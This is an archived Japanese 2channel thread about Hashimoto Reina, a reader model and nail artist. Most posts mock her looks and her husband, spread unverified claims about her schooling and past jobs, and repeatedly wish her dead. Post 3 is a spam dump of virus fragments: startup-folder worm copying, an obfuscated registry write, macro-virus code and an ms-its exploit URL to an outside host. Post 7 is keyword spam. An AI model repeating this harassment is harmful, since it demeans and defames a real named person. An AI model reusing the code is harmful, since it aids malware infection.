5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆橋本玲奈さん☆廃刊ケテーイMen's egg読モpart5☆

1 :無名モデル:2006/10/19(木) 22:17:32 ID:Vht5g3jt
大学時代からネイルスクールに入りネイリスト資格獲得。
読モとしても活躍してる、橋本玲奈さんについて存分に語りましょ☆

橋本玲奈のBeauty Expert
http://ameblo.jp/reinail/

メンエグ11月号をもって廃刊とあいなりました。
ミスユニバースってどのくらいメンエグの息がかかってるんですかね。
最終まで枠が残っていて、必ずメンエグの人が何らかの賞を取れるようになっているとか?
…どうでつか?

part1 http://life7.2ch.net/test/read.cgi/model/1063302937/
part2 http://life7.2ch.net/test/read.cgi/model/1118416829/
part3 http://life7.2ch.net/test/read.cgi/model/1129780568/
part4 http://life7.2ch.net/test/read.cgi/model/1142264761/

2 :無名モデル:2006/10/19(木) 22:41:24 ID:ft0HZvN6
2ゲット

3 :<body onload=window()>:2006/10/19(木) 22:41:30 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

4 :無名モデル:2006/10/28(土) 13:18:50 ID:???
>>1さんありがと〜

土曜日発売かな?

5 :無名モデル:2006/10/29(日) 13:03:49 ID:???
書きこんで!!

6 :無名モデル:2006/10/29(日) 20:33:55 ID:ySR3svqi
ここメンエグ次スレ?

7 :無名モデル:2006/10/29(日) 22:41:20 ID:???
佐賀県佐賀県庁舎佐賀県知事佐賀県議会佐賀県議長佐賀県職員
不正汚職賄賂猥褻飲酒不当圧力暴力隠蔽謝罪癒着マージン配当
もみ消し虚偽報告県民企業地元商店実力者馴れ合い談合婦女暴行
犯罪贈賄収賄県立高校教師生徒不純異性交遊売春買春いたずら
事故ひた隠し隠蔽改竄書類紛失報告せず上司部下職員派遣社員
報告書個人情報漏洩機密流出盗聴プライバシー侵害覗き侵入電波
上司部下暴力犯罪窃盗詐欺行為騙し騙る嘘煙草吸殻投棄腐敗偽
佐賀県内企業公害環境破壊発病発症症状警告余命診断書認定
殺人強姦暴行傷害殺傷刺殺撲殺扼殺毒殺混入異物異臭異端視
鈴木田中山田加藤佐藤藤原山本山田高橋橋本島田須藤渡辺木
彰明正忠飯田飯島中村中島敦洋子陽子葉子茂彦輔大輔瞳代江
隆孝良子子明子晶子彰子京子恭子今日子千賀子恵美千夏春秋
オンブズマン市民団体職員質問状態度数日本当然破壊滅失態
NPONGO部落民被差別差別中傷訴訟敗訴控訴上告告発告訴破滅
中学高校大学専門学校学生生徒いじめ自殺誘拐拉致傷害名誉毀損
欠陥品不良品事故搾取詐欺佐賀県職員役員課長次長委員長名誉
佐賀市佐賀県民郡部姿勢県政県政腐敗権利侵害義務不履行怠慢
犬猫苦情住民住人県民選挙違反県警切符揉み消し交通機関失態
集団戦争供応饗応ミス診断医療刑務所刑務間警察官刑事容疑者
統合失調症精神病無罪有罪判決民事刑事事件勝訴敗訴訴状告発
裁判検察弁護士裁判官判決家庭地方最高セクハラハラスメント
クレーム暴力団組員構成員自称前科犯罪再犯人格差不公平和

8 :無名モデル:2006/11/01(水) 17:39:13 ID:m8c2GtuZ
あげ

9 :無名モデル:2006/11/04(土) 10:04:57 ID:???
橋本レイカ?

10 :無名モデル:2006/11/08(水) 08:13:51 ID:???
175~190って感じかな、男は
Brad Koenig?models.comのランキングで最近見ないけどなんでだろ
結構でてるのにね

11 :無名モデル:2006/11/09(木) 19:37:01 ID:7u2o7UtJ
堕ちる

12 :無名モデル:2006/11/09(木) 19:53:33 ID:???
どこの大学出身?

13 :無名モデル:2006/11/09(木) 20:02:12 ID:???
かわいくないよねこの人

14 :無名モデル:2006/11/09(木) 23:30:56 ID:5qVCnVKl
>>12
しゃくれ大学鷲鼻学部出身

15 :無名モデル:2006/11/10(金) 02:28:44 ID:???
旦那が一般人のくせしてしゃしゃり出てきてウザイ
しかもチビでキモいし

16 :無名モデル:2006/11/10(金) 13:42:03 ID:???
>>6
正解です!!☆
本スレはこちらで☆

17 :無名モデル:2006/11/14(火) 21:12:34 ID:pps5Er3m
発売あげ

18 :無名モデル:2006/11/19(日) 07:58:47 ID:???
玲奈さんすごいきれい。
リッチなダンナさまと結婚してセレブオーラがすごい。

19 :無名モデル:2006/11/23(木) 15:48:56 ID:PQAq5aBp
レイナちゃんはどこの人なの?とても好感持てるな!

20 :無名モデル:2006/11/23(木) 16:36:29 ID:???
玲奈ってクチが小さいし薄っぺら〜いから幸薄顔…
ダンナ ロリだし。

21 :無名モデル:2006/11/23(木) 18:58:10 ID:???
なんで大学でてないのに嘘つくのかな?
高卒だよ、彼女。。。

22 :無名モデル:2006/11/23(木) 20:13:14 ID:/7TtA0j/
この人のサロン行ったけど、準備してなさすぎ。
しかも、撮影長引いたかなんかで、30分待たされるし、むかついたわ。
マニキュア上にホログラムのせ、ジェルコーティングして、とれないか
大丈夫って言ったけど、ホログラムすぐ取れたし・・・
 普通、マニキュアの上にジェルコーティングしても、密着悪いから、
他のサロンではしないし、もしくは、説明をきちんとすると思うけど、
全くしない。何が大丈夫だ。この人のスカルプ先細りすぎ。
適度な先細りはいいけど、この人のは極端。
 こいつ鼻につく


普通は、

23 :無名モデル:2006/11/23(木) 20:44:40 ID:???
>>21
プッ…高卒なんだ。
だから結婚も早いんだねー。

24 :sage:2006/11/23(木) 20:51:02 ID:1kYIFYjU
静岡県出身

25 :無名モデル:2006/11/29(水) 19:57:09 ID:bjsGlhkr
ナチュラ行ってコイツがいると気分悪い!スゲー高飛車な態度がムカつく!知り合いにはニコニコしちゃって〜死ね!!

26 :無名モデル:2006/11/29(水) 22:53:21 ID:9tHddwK4
↑じゃぁ、行かなければいいんじゃない?



27 :無名モデル:2006/11/30(木) 11:47:57 ID:UwXZ/+8J
かわいい!!

28 :無名モデル:2006/11/30(木) 20:13:27 ID:YcGRYL7Z
>>22  まな。


29 :無名モデル:2006/11/30(木) 22:04:18 ID:XPJ6fDrC
シャクレ(;¬_¬)

30 :無名モデル:2006/11/30(木) 22:47:06 ID:???
しゃくれ氏ね

旦那恐ろしく不細工

31 :無名モデル:2006/11/30(木) 22:47:55 ID:???
まじで高卒なの?
大嘘吐きじゃねーかよ

32 :無名モデル:2006/11/30(木) 22:57:45 ID:???
こいつのネイルへたくそ

33 :無名モデル:2006/11/30(木) 23:28:36 ID:XPJ6fDrC
旦那不細工なんだ〜?
やっぱコイツは金か〜セレブ気取ってるけど所詮ただの田舎もん!ネイルも下手だしシャクレだし最悪だ。

34 :無名モデル:2006/11/30(木) 23:51:11 ID:DYsqXKLo
高卒なんじゃなくて、大学中退でしょ。

35 :無名モデル:2006/11/30(木) 23:59:21 ID:???
旦那本当に不細工
あんなのとよく結婚できたね。
金に目がくらんだんだろうねw

っていうかネイルが下手杉

36 :レイナ:2006/12/01(金) 01:04:54 ID:???
ダンナ 12才も年上だから 老後の20年間は独り孤独な人生が待ってるのよね〜


37 :無名モデル:2006/12/01(金) 01:54:41 ID:???
↑貴様はひっこんどれ。チンカス野郎が

38 :無名モデル:2006/12/01(金) 10:21:55 ID:???
↑オマエ もう飽きた。

39 :無名モデル:2006/12/01(金) 20:29:57 ID:???
何 事故ってんの コイツw
日頃の行い悪いんじゃなくって?

40 :無名モデル:2006/12/01(金) 21:41:08 ID:???
事故で氏ねば良かったのにw

41 :細木ですけど:2006/12/01(金) 22:40:40 ID:???
夫婦そろって 何で大殺界で結婚しちゃったの、アンタたち。

42 :無名モデル:2006/12/02(土) 03:51:02 ID:???
>>41
ワロスw

こいつさ、ドクモとしてはまあまあだし、人柄も悪くない。
だが、ネイルが悲しいくらい下手なのよね・・・。

43 :無名モデル:2006/12/02(土) 10:59:37 ID:???
例えばどういう風に下手だったの?

44 :無名モデル:2006/12/03(日) 04:14:20 ID:???
顎が出すぎw


45 :無名モデル:2006/12/03(日) 15:48:29 ID:RxSv8Z/Y
そうそう顎出過ぎのシャクレ過ぎW

46 :無名モデル:2006/12/04(月) 14:26:44 ID:???
  こいつ受付の時感じ悪いよね 

47 :無名モデル:2006/12/04(月) 20:07:28 ID:QwechRw8
↑同感
ホント受付の時感じ悪い!

48 :無名モデル:2006/12/04(月) 22:08:23 ID:???
荘一さん元気かしら?

49 :無名モデル:2006/12/04(月) 22:13:53 ID:HOie0Zgz
旦那は別に不細工じゃないとおもう。


50 :無名モデル:2006/12/05(火) 00:20:39 ID:???
どこでキャバ嬢してたの?
ダンナそこの客だったのかな?

51 :無名モデル:2006/12/06(水) 01:56:48 ID:???
キャバ嬢だったんだ。
納得したw

本当受付感じ悪すぎだよな

とりあえず氏ね

52 :無名モデル:2006/12/06(水) 10:01:17 ID:???
しゃくれは受付禁止

顎出てる奴ってみてて不快、生理的に受け付けない

53 :無名モデル:2006/12/06(水) 10:39:42 ID:???
受付感じ悪いけど、ネイルのお客にはやさしいよ。

54 :無名モデル:2006/12/06(水) 23:45:22 ID:+2KW079P
そうそう!ネイルの客には愛想いいんだよ〜またそこがムカつく!氏ね!!

55 :無名モデル:2006/12/07(木) 00:13:53 ID:???
↑おのれはすっこんどれチンカスが。

http://life7.2ch.net/test/read.cgi/model/1165356286

56 :無名モデル:2006/12/07(木) 04:28:15 ID:???
こいつ計算高いんだよな。
だから金目当てに結婚したりできるし。
事故で氏ねばヨカターヨ・゚・(ノД`)・゚・こんな顎女

57 :無名モデル:2006/12/07(木) 05:07:09 ID:fSEvc9Ox
玲奈さん可愛ければイイ!!

58 :無名モデル:2006/12/07(木) 06:57:14 ID:???
>>57
まず可愛くないお(^ω^)

59 :無名モデル:2006/12/07(木) 07:00:55 ID:???
かなり可愛い

60 :無名モデル:2006/12/07(木) 11:51:17 ID:???
なんか顎女の自演が見苦しい

はしもとれいなは顎がしゃくれてます

61 :無名モデル:2006/12/07(木) 11:53:17 ID:???
つか怪我で氏ねはよかったのにm9(^Д^)プギャー

62 :無名モデル:2006/12/07(木) 18:17:47 ID:dE4yTuBT

人のことをしねといえる人の人間性を疑います。愛情に乏しいんですね、きっと。

63 :無名モデル:2006/12/08(金) 03:29:49 ID:???
と、はしもと顎女が申しております。
つか、仕事真面目にやれよ、カス

64 :無名モデル:2006/12/08(金) 04:03:21 ID:???
↑おのれはすっこんどれチンカスが。
http://life7.2ch.net/test/read.cgi/model/1165356286/

65 :無名モデル:2006/12/08(金) 08:18:44 ID:agglt/N0
可愛ければイイ!!☆

66 :無名モデル:2006/12/08(金) 09:06:51 ID:agglt/N0
JJには載ってたはずやけど…!!☆

67 :無名モデル:2006/12/08(金) 09:23:48 ID:???
>>65-66

顎女自演ですか?"( ´,_ゝ`)プッ"

だから氏ねってことなんだよWW

68 :無名モデル:2006/12/08(金) 12:08:08 ID:agglt/N0
袖の部分も裾の部分もディアマンテのときはギザギザってゆうか
真っ直ぐじゃないけど
今の真っ直ぐだモン寝。
コレ生地全然違うわ。

どう見ても違う。

69 :無名モデル:2006/12/08(金) 14:05:50 ID:PDfQa/jM
てかこの人普通にキレイ。好感持てるし、性格良さそうだし、上品顔。
この人の悪口かく人ウザイ。旦那は確かに。。。金持ちかもしれないけど顔は
あんまり。。。笑れいなちゃんにはもったいないかも。てかまじキレイな家に
住んでるよね。幸せそう。子供早く作っちゃえばいいのに。


70 :無名モデル:2006/12/08(金) 22:18:22 ID:???
幸薄顔じゃん

71 :無名モデル:2006/12/08(金) 23:28:22 ID:???
鼻とアゴが、とんがりんこ☆

72 :無名モデル:2006/12/08(金) 23:43:53 ID:???
顎の自演がヒドス('A`)

性格よくねーwwww
人によって態度変えるからね、こいつ。

73 :無名モデル:2006/12/09(土) 02:40:49 ID:???
↑おのれはすっこんどれチンカスが。

http://life7.2ch.net/test/read.cgi/model/1165356286/

74 :無名モデル:2006/12/09(土) 04:01:48 ID:???
旦那ありえないくらいキモイ

橋本さんって華がないよね・・・。なんか垢抜けないってかんじ。

75 :無名モデル:2006/12/09(土) 18:10:23 ID:Sq+A7OUw
↑ホント旦那キモスギW

華ないのに高飛車な態度、ネイルの客にはニコニコして人によって態度を変える糞はいらない!!

76 :無名モデル:2006/12/10(日) 00:53:29 ID:PmDLR23g
あんたたち、文句言うならまず同じ土俵に立ってからものいったら?
きらいなら、みなければいいだけのことじゃないですか?
ほんと、見苦しい・・・

77 :無名モデル:2006/12/10(日) 01:34:15 ID:C8dTutf/
ネイルの客にはニコニコって、ネイリストなんだから当たり前なんじゃない?
読モだけど別に特別綺麗でもなく、普通の人だったし、
態度も飛び抜けて良いわけでもないけど悪いわけでもなかったよ。
ネイルは可愛かったし。
ちょっと雑誌に出てる普通のネイリストがなんでそこまで叩かれるのかよくわからない。
なんか私怨っぽぃなぁ…

78 :無名モデル:2006/12/10(日) 02:12:01 ID:???
客はともかく友達とのこと全く書かないけど
友達いるのかな?この人
ドクモの食事会にも誘われていなそうだし

79 :無名モデル:2006/12/10(日) 02:19:29 ID:???
結婚してセレブオーラすごいでてると思っ。
学生時代のサロモの雑誌みたけど、結婚してかなりきれいになったね。
自分にかなりお金かけられて旦那さんリッチでうらやますぃ。

80 :無名モデル:2006/12/10(日) 03:30:47 ID:???
>>79
顎女自演ですか?"( ´,_ゝ`)プッ"

セレブも何も、オーラ自体ありませんからw

81 :無名モデル:2006/12/10(日) 10:12:57 ID:FpvXvkkr
でも可愛い!!☆

82 :無名モデル:2006/12/10(日) 14:47:51 ID:???
顎しゃくれてる!!☆

83 :無名モデル:2006/12/10(日) 18:36:21 ID:Pae8BKci
顎女!自演が見苦しい!!

84 :無名モデル:2006/12/10(日) 23:44:16 ID:sk6CQ/ws
ここのスレって、ほめると必ず自演て言われるんですね〜
他のドクモのスレでもかなりそうだし・・・同じ人じゃない?
別に人の顔のことなんて、どうでもよくない??
文句を言う人の顔みてみたいわ〜
きっと、人の悪口ばかりいうひとだから、ひどい顔してるんだろうね。。

85 :無名モデル:2006/12/11(月) 00:43:08 ID:ZXJdK/Lw
http://mbga.jp/AFmbb.Tvtg99176/
がすごいいいよ☆有名だからもう知ってるかな?
友達作ったりメ−ル、サークル、悩み相談、オンラインで
ゲームできたりするんだよね!
あたしは好きな芸能人が一緒の友達をふやしたよ!
周りのコもいっぱいやってて実際このサイトで
リアルの友達発見したことあるよ。笑
完全無料だし気になったらやってみて☆

なんか宣伝みたいになっちゃってごめんなさい(>△<)汗
いっぱい友達増やしたかったんで♪

86 :無名モデル:2006/12/11(月) 04:19:19 ID:???
顎wwwwwwwwww


87 :無名モデル:2006/12/11(月) 11:51:39 ID:Mj4p2GiZ
顎そんなにひどいか?それにしても旦那さんラッキーだよね。36歳にして
あんなキレイな若妻嫁にもらえて。料理も得意みたいだし。付き合って5ヶ月で
結婚。。。旦那30代半ばだしそうとう焦ってたのかな?ネイルの客の紹介で
知り合ったみたいだけど。笑 本人は人生「どこでどんな出会いがあるか分かり
ませんね♪」ってうかれてたよ。あんな旦那で。子供れいなさんに似ればいいのに。

88 :無名モデル:2006/12/11(月) 20:28:30 ID:???
>>87
と、アゴが申しております。

89 :無名モデル:2006/12/11(月) 22:29:16 ID:???
顎w

90 :無名モデル:2006/12/11(月) 23:56:40 ID:???
化粧というかファンデがすさまじく濃かった・・・

91 :無名モデル:2006/12/12(火) 03:05:12 ID:73gQ3PcW
きっと、撮影の後だったんじゃない?
私も撮影のときはメイク濃くされるし。
みんなそうだよ。
そんなこと、どうでもいいじゃん。

92 :無名モデル:2006/12/12(火) 10:12:59 ID:MePXZv7g
かわいい…!!☆

93 :無名モデル:2006/12/12(火) 10:46:37 ID:7G+2wKF8
かわいい・・・!!☆って定期的に入ってるけど自演?


94 :無名モデル:2006/12/12(火) 19:57:30 ID:???
顎の自演ヒドス('A`)

顎は酷いですねw
猪木みたいだお。

95 :無名モデル:2006/12/14(木) 19:09:57 ID:???
この人受付したときに愛想なくて残念でした。
もっと感じのいい方だと思っていたので・・・。
お顔は綺麗といえばそうかもしれませんが、私的には・・・?って
感じでしたね。
態度が悪かったからそう感じたのかもしれませんが・・・

96 :無名モデル:2006/12/14(木) 19:18:08 ID:4vUFaX/y
態度悪いんですか?そんな風に見えないけど。怖いですね!

97 :ロリ男:2006/12/14(木) 23:59:03 ID:Rr7Ng+wp
「 やっぱり 女は馬鹿でも不細工でも 若い方がいいよなー 」

98 :無名モデル:2006/12/15(金) 00:31:04 ID:???
目小さいしかわいくない。
なんか顔にしまりがなくない?

99 :無名モデル:2006/12/15(金) 15:30:57 ID:SOQa3lAl
敬語使えないくらいいいじゃない…若いんだし。
最初は敬語使ってたよー仲良くなってからタメ語になったけど、若いうちは敬語くらい許容範囲です。
何故なら可愛いから…いや、可愛いくて素直で好きだから。
因みに誰だって最初からギャルじゃないでしょうに……。
でもすっぴんでも可愛い…訳あってもう会えないんだけど本当に大好き。
玲奈ちゃん見ると自分がコケシかハニワっぽく見えて……
整形しようか考えちゃうし私が男だったら貢いでたかも……orz

100 :無名モデル:2006/12/15(金) 16:09:11 ID:???
玲奈も埴輪顔じゃんw

101 :無名モデル:2006/12/15(金) 16:16:31 ID:???
般若にも似てるねw

102 :無名モデル:2006/12/17(日) 21:28:56 ID:???
般若ワロスwwwwwwwwwwww

こいつのストーンの置き方のセンスのないことw

103 :無名モデル:2006/12/18(月) 00:41:33 ID:???
>>99
25才で敬語使えないって終ってんだろw
しかも 若くないし別に可愛くもないからw

104 :無名モデル:2006/12/18(月) 11:10:41 ID:riDiq5z7
じゃあ、ブログ見んなって。
細かいとこ見ながら文句いうなんて、あんたも相当暇だね。

105 :無名モデル:2006/12/18(月) 11:18:40 ID:DnaQyZYs
でも、けっこうかわいい…!!☆

106 :無名モデル:2006/12/18(月) 12:25:13 ID:???
>>104
と、本日定休日で仕事が休みの玲奈が申しておりますw

107 :無名モデル:2006/12/19(火) 23:03:38 ID:???
玲奈って自演とかしない人だと思ってったのに><
そこいらの馬鹿ドクモと一緒のレベルなんだね

108 :無名モデル:2006/12/20(水) 00:25:08 ID:???
結婚してもちゃんと仕事してる面とかただ環境に恵まれてるだけの
他の毒モとは全然違うと思う。
技術がいいかどうかは別としてもね。

109 :無名モデル:2006/12/22(金) 17:55:52 ID:???
ただ単に家のローンがきついから
パートに出てるだけだろw

こいつの接客態度悪いね。ビックリした。

110 ::2006/12/22(金) 20:09:07 ID:???
ホントこいつの態度の悪さにビックリする!!

111 :無名モデル:2006/12/22(金) 23:58:02 ID:???
シャクレまくり

112 :無名モデル:2006/12/23(土) 00:56:59 ID:???
顎女〜厳しい(≧ω≦)w

113 :無名モデル:2006/12/23(土) 01:34:41 ID:UHeNLeQj
こいつの旦那って、青年実業家なんでしょ?
いくつも会社経営してるらしいよ。
パートなんて到底必要ないんじゃない?
でも、他の毒モと違って金遣い荒いのひけらかしてないよね。
好きでやってるんじゃん?
てゆうか、私、ナチュラでみたことあるけど、ぜんぜんあれはしゃくれてるって言わないと思う。
特別美人かどうかはわかんないけど、別に普通のネイリストなんじゃない?
あんまり知らない人のあらさがしばっかりしないほうがいいと思うけど。


114 :無名モデル:2006/12/23(土) 02:03:05 ID:???
と、橋本顎奈が申しております

115 :無名モデル:2006/12/23(土) 02:12:22 ID:???
橋本顎奈ウケル〜www
醜い!!

116 :無名モデル:2006/12/23(土) 02:33:20 ID:???
やっぱり顎が長いってすごいマイナスだ
顎があと1センチ短ければ人生変わっただろうに
可哀想・・・。

どうしても印象が猪木になってしまう><

117 :無名モデル:2006/12/24(日) 11:35:38 ID:???
れいなちゃんもとっくに別れたって言ってた。やっぱり別れたんだね。この二人

118 :無名モデル:2006/12/25(月) 10:51:22 ID:mGQZmCXJ
まじで?離婚したの?うそだよね〜?笑

119 :無名モデル:2006/12/25(月) 13:36:07 ID:???
してないだろ

120 :無名モデル:2006/12/25(月) 14:45:53 ID:mGQZmCXJ
そりゃしてねーよな。
木本んとこは謎。旦那ほっぽりだして外食ばっか行ってるし。そろそろ離婚の危機なんじゃない
?塩崎んとこみたいにバカみたいにラブラブっぷりアピールしてる奴もいれば。
清弘はいつ結婚するのか分からんし。


121 :無名モデル:2006/12/25(月) 14:53:01 ID:bRPvCM/W
頑張って!

122 :無名モデル:2006/12/26(火) 01:38:45 ID:???
玲奈!ボンバイエ!
玲奈!ボンバイエ!

123 :アントニオ玲奈:2006/12/26(火) 17:32:52 ID:???
1・2・3・ダーッ!

124 :無名モデル:2006/12/27(水) 01:46:58 ID:???
アントニオ玲奈

ワロスwwwwwwwwwwwwwww

顎って強烈だよなw

21 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)